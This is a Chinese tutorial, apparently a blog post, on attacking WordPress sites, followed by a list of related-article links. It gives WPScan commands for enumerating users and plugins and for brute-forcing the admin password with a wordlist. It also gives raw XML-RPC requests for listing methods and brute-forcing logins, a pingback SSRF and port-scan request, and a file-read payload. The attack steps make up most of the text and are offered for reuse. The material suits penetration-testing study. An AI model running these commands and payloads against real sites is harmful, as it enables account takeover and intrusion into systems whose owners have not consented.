Wordpress漏洞利用WPscan使用
WordPress是一个开源的内容管理系统(CMS),在全球范围内使用比较广泛,当遇到一个WP站点时可以首先用WPscan进行扫描收集信息
WPscan
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞,在遇到wp站点时可以扫描一下
1、刺探基础信息:
wpscan --url http://www.example.com2、猜解后台用户名
wpscan --url http://www.example.com --enumerate u3、使用字典暴破用户名admin的密码
wpscan --url http://www.example.com -P password.txt -U admin 4、扫描插件
wpscan --url http://www.example.com --enumerate p5、扫描易受攻击的插件
wpscan --url http://www.example.com --enumerate vp6、扫描所有插件
wpscan --url http://www.example.com --enumerate ap
渗透wordpress的思路:
(1)暴力破解其账户密码尝试top10的账号,弱口令密码用wpscan对用户名以及密码进行枚举等
(2)插件漏洞的破解
对其进行插件扫描:
wpscan --url http://192.168.1.72 --enumerate ap --plugins-detection aggressive建议扫描的时候使用aggressive模式,不然有些插件扫描不出来
wordpress的主要还是从插件下手,对于识别出的插件可以在网站搜索漏洞
https://wpscan.com/search
之后做个脚本小子就行了,复现漏洞
xmlrpc.php
如果网站存在xmlrpc.php,有以下几种利用方式
查看系统允许的方法
POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 135<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
暴力破解用户名
POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 235<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>\{\{your username\}\}</value></param>
<param><value>\{\{your password\}\}</value></param>
</params>
</methodCall>
用wpscan爆破密码也是利用的xmlrpc.php
wpscan --url http://www.example.com -P password.txt -U admin
破解成功后可以去后台登录,登陆地址是:网站域名/wp-admin/
SSRF
WordPress 版本< 3.5.1
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描
POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
脚本
https://github.com/FireFart/WordpressPingbackPortScanner
读取文件
不一定成功
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>pingback.ping
</methodNmae>
<params>
<param>
<value>
<string>
file://C:\wamp64\www\htdocs\sfc\wp-includes\rss-functions.php
</string>
</value>
</param>
</params>
</methodCall>
Wordpress漏洞利用WPscan使用相关推荐
- Wordpress漏洞,WPScan使用完整攻略
转载https://blog.csdn.net/m0_37438418/article/details/81109660 爆路径方法: 1.http://www.chouwazi.com/wp-adm ...
- WPScan扫描Wordpress漏洞
一.什么是Wpscan?什么是Wordpres? 1.Wpscan WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户 ...
- WordPress漏洞扫描工具WPScan
WordPress漏洞扫描工具WPScan WordPress是主流的PHP网站模版,以构建博客而闻名.WordPress可以通过安装插件和主题的方式扩展功能,这也带来的安全隐患.WordPress是 ...
- WordPress最新网站漏洞利用及修复解决方案
WordPress最新版本存在远程代码注入获取SHELL漏洞,在2019年,该网站漏洞影响的版本是WordPress5.0,甚至是致命的一个漏洞,包括目前的wordpress 4.8.6 以及word ...
- 2021-08-22dc6靶机实战wp插件漏洞利用+suid提权+rockyou+sudo -l换命令写shell+nmap运行nse提权(转)
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnh ...
- Stapler-1靶场详细教学(7种漏洞利用+5种提权)
目录 前言 简介 信息收集 0x00 主机发现 0x01 端口探测 0x02 信息收集-1 0x03 信息收集-2 0x04 漏洞利用-1 0x05 信息收集-3 0x06 漏洞利用-2 0x07 漏 ...
- Wordpress漏洞
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php 2.http://www.chouwazi.com/wp-content/pl ...
- wordpress漏洞_WordPress XSS漏洞可能导致远程执行代码(RCE)
原作者: Ziyahan Albeniz 在2019年3月13日,专注于静态代码分析软件的RIPS科技公司发布了他们在所有版本的WordPress 5.1.1中发现的跨站点脚本(XSS)漏洞的详细信息 ...
- 您需要了解的WordPress漏洞以及如何修复它们
by Joel S. Syder 乔尔·赛德(Joel S.Syder) 您需要了解的WordPress漏洞以及如何修复它们 (WordPress vulnerabilities you need t ...
最新文章
- python 脚本撞库国内“某榴”账号
- Solaris10之SVM简析
- c语言判断程序设计,C语言程序设计之判断(38页)-原创力文档
- ARM开发软件及实用软件介绍
- [Java基础]IO流小结
- Storm教程2安装部署
- Hyper-V Server 存储空间
- 快速幂算法(矩阵快速幂还不是很会。。日后会更新)
- ts获取服务器数据_在 Angular6 中使用 HTTP 请求服务端数据
- 赢在微点答案专区英语_自考英语二太难?看了墨盒的单词本,保你信心满满去考试!...
- JavaScript使用Modbus协议实现RTU设备连云
- ViewPager2撸个3D画廊
- excel切片器_Excel折线图这样做,老板看了要崩溃
- 写给自己的Java程序员学习路线图
- Xv6学习之kinit1
- 软件测试之α测试和Beta测试
- Vector人工智能机器人SDK使用笔记
- 转发真阿当老师的一片文章 受益匪浅 (出处:http://cly84920.blog.163.com/blog/static/24750013320158203575958/)...
- 关于TTS SpeechVoiceSpeakFlags几个值的中文意思?
- arduino 水位传感器_Arduino教程┃数字传感器和模拟传感器的区别
热门文章
- 【解决】LayUI表单验证,提交按钮在弹出层,lay-verify失效的情况
- TVB举行台庆亮灯仪式 帝后大热门黎耀祥邓萃雯抢眼
- JavaWeb项目:新闻发布系统02(新闻系统功能制作)
- 串激电机和普通电机有何区别?软启动电机和普通电机有何区别?
- EduIQ Network LookOut Administrator
- 为何中国没有亚伦 斯沃茨_史蒂夫·斯沃茨(Steve Swartz)让我们想起了靛蓝的意图...
- java如何添加一个网段,java 判断ip是不是属于一个网段
- 5G NR PDCCH概述
- 甘道夫,一种用于安全部署的端到端分析服务 Gandalf, an end-to-end analytics service for safe deployment
- Linux常用的命令--60个命令总结汇总